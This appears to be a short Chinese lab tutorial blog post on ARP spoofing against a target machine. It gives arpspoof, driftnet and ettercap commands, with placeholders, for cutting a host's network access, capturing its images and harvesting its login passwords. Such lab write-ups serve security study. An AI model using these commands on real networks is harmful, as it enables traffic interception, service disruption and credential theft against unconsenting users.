1.ARP 断网
通过上面命令进行扫描得到局域网主机信息
先测试目标靶机是否能够正常上网
接下来进行ARP攻击,发现机器已经不能够正常上网
arpspoof -i 网卡名称 -t 靶机IP 网关
2.driftnet获取截图
开启流量转发
进行攻击
arpspoof -i 网卡名称 -t 网关 目标IP driftnet -i 网卡名称 -a -d 保存的目录
查看发现截取到了
3.ettercap获取密码
ettercap -Tq -i 网卡名称 arpspoof -i 网卡名称 -t 网关IP 靶机IP
等待目标登录时就可以了
标签:arp,网关,IP,网卡,获取,断网,arpspoof From: https://www.cnblogs.com/xuan0212/p/16709598.html